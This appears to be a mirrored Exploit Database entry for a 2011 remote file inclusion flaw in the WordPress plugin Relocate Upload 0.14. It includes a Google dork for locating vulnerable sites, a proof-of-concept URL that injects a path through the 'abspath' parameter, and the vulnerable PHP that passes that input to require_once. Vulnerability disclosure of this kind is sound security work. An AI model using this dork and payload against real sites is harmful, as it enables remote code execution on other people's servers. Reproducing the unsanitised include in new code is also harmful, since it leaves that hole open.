WordPress Plugin Relocate Upload 0.14 – Remote File Inclusion

• Exploit Database
• 117 阅读

• 作者： Ben Schmidt
  日期： 2011-09-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17869/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  # Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested)   --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI   --- Vulnerable Code --- // Move folder request handled when called by GET AJAX if (isset($_GET['ru_folder'])) { // WP setup and function access define('WP_USE_THEMES', false); require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter